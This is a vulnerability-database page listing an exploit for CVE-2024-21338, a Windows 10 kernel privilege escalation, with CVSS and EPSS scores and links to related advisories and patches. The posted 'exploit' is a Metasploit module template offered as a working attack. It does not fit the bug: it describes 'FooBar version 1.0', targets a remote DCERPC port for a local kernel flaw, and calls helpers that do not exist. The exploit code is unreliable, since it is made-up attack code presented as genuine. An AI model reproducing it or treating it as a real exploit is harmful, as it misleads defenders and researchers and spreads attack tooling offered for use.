Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
zdtE1 Coders1337DAY-ID-39515
HistoryApr 02, 2024 - 12:00 a.m.

Microsoft Windows 10.0.17763.5458 - Kernel Privilege Escalation Exploit

2024-04-0200:00:00
E1 Coders
0day.today
21
microsoft windows 10
kernel privilege escalation
exploit
cve-2024-21338
remote code execution
vulnerability
vulnerability exploit

7.8 High

CVSS3

Attack Vector

LOCAL

Attack Complexity

LOW

Privileges Required

LOW

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

7 High

AI Score

Confidence

Low

4.3 Medium

CVSS2

Access Vector

LOCAL

Access Complexity

LOW

Authentication

SINGLE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:L/AC:L/Au:S/C:P/I:P/A:P

0.001 Low

EPSS

Percentile

43.6%

JSON
#############################################
# Exploit Title :  Microsoft Windows 10.0.17763.5458 - Kernel Privilege Escalation
# Exploit Author: E1 Coders
# CVE: CVE-2024-21338
#############################################

 
require 'msf/core'
 
class MetasploitModule < Msf::Exploit::Remote
  Rank = NormalRanking
 
  include Msf::Exploit::Remote::DCERPC
  include Msf::Exploit::Remote::DCERPC::MS08_067::Artifact
 
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'CVE-2024-21338 Exploit',
        'Description' => 'This module exploits a vulnerability in FooBar version 1.0. It may lead to remote code execution.',
        'Author' => 'You',
        'License' => MSF_LICENSE,
        'References' => [
          ['CVE', '2024-21338']
        ]
      )
    )
 
    register_options(
      [
        OptString.new('RHOST', [true, 'The target address', '127.0.0.1']),
        OptPort.new('RPORT', [true, 'The target port', 1234])
      ]
    )
  end
 
  def check
    connect
 
    begin
      impacket_artifact(dcerpc_binding('ncacn_ip_tcp'), 'FooBar')
    rescue Rex::Post::Meterpreter::RequestError
      return Exploit::CheckCode::Safe
    end
 
    Exploit::CheckCode::Appears
  end
 
  def exploit
    connect
 
    begin
      impacket_artifact(
        dcerpc_binding('ncacn_ip_tcp'),
        'FooBar',
        datastore['FooBarPayload']
      )
    rescue Rex::Post::Meterpreter::RequestError
      fail_with Failure::UnexpectedReply, 'Unexpected response from impacket_artifact'
    end
 
    handler
    disconnect
  end
end
 
 
#refrence :  https://nvd.nist.gov/vuln/detail/CVE-2024-21338

Related

packetstorm 1
githubexploit 3
cisa_kev 1
thn 2
prion 1
attackerkb 1
mscve 1
cve 1
exploitdb 1
qualysblog 1
avleonov 1
mskb 6
openvas 4
nessus 6
kaspersky 1
rapid7blog 1
packetstorm
packetstorm
Microsoft Windows 10.0.17763.5458 Privilege Escalation
2024-04-02 00:00:00
githubexploit
githubexploit
Exploit for Vulnerability in Microsoft
2024-04-23 19:09:22
Exploit for Vulnerability in Microsoft
2024-04-17 10:16:21
Exploit for Vulnerability in Microsoft
2024-04-13 05:53:02
cisa_kev
cisa_kev
Microsoft Windows Kernel Exposed IOCTL with Insufficient Access Control Vulnerability
2024-03-04 00:00:00
thn
thn
Lazarus Hackers Exploited Windows Kernel Flaw as Zero-Day in Recent Attacks
2024-02-29 11:19:00
North Korea's Lazarus Group Deploys New Kaolin RAT via Fake Job Lures
2024-04-25 16:47:00
prion
prion
Privilege escalation
2024-02-13 18:15:00
attackerkb
attackerkb
CVE-2024-21338
2024-02-13 00:00:00
mscve
mscve
Windows Kernel Elevation of Privilege Vulnerability
2024-02-13 08:00:00
cve
cve
CVE-2024-21338
2024-02-13 18:15:49
exploitdb
exploitdb
Microsoft Windows 10.0.17763.5458 - Kernel Privilege Escalation
2024-04-02 00:00:00
qualysblog
qualysblog
Microsoft and Adobe Patch Tuesday, February 2024 Security Update Review
2024-02-13 20:03:29
avleonov
avleonov
February 2024: Vulremi, Vuldetta, PT VM Course relaunch, PT TrendVulns digests, Ivanti, Fortinet, MSPT, Linux PW
2024-03-05 18:43:32
mskb
mskb
February 13, 2024—KB5034763 (OS Builds 19044.4046 and 19045.4046)
2024-02-13 08:00:00
February 13, 2024—KB5034765 (OS Builds 22621.3155 and 22631.3155)
2024-02-13 08:00:00
February 13, 2024—KB5034768 (OS Build 17763.5458)
2024-02-13 08:00:00
openvas
openvas
Microsoft Windows Multiple Vulnerabilities (KB5034763)
2024-02-14 00:00:00
Microsoft Windows Multiple Vulnerabilities (KB5034768)
2024-02-14 00:00:00
Microsoft Windows Multiple Vulnerabilities (KB5034766)
2024-02-14 00:00:00
nessus
nessus
KB5034763: Windows 10 Version 21H2 / Windows 10 Version 22H2 Security Update (February 2024)
2024-02-13 00:00:00
KB5034768: Windows 10 version 1809 / Windows Server 2019 Security Update (February 2024)
2024-02-13 00:00:00
KB5034766: Windows 11 version 21H2 Security Update (February 2024)
2024-02-13 00:00:00
kaspersky
kaspersky
KLA63958 Multiple vulnerabilities in Microsoft Windows
2024-02-13 00:00:00
rapid7blog
rapid7blog
Patch Tuesday - February 2024
2024-02-13 21:26:21

7.8 High

CVSS3

Attack Vector

LOCAL

Attack Complexity

LOW

Privileges Required

LOW

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

7 High

AI Score

Confidence

Low

4.3 Medium

CVSS2

Access Vector

LOCAL

Access Complexity

LOW

Authentication

SINGLE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:L/AC:L/Au:S/C:P/I:P/A:P

0.001 Low

EPSS

Percentile

43.6%

JSON
Related for 1337DAY-ID-39515
packetstorm1githubexploit3cisa_kev1thn2prion1attackerkb1mscve1cve1exploitdb1qualysblog1avleonov1mskb6openvas4nessus6kaspersky1rapid7blog1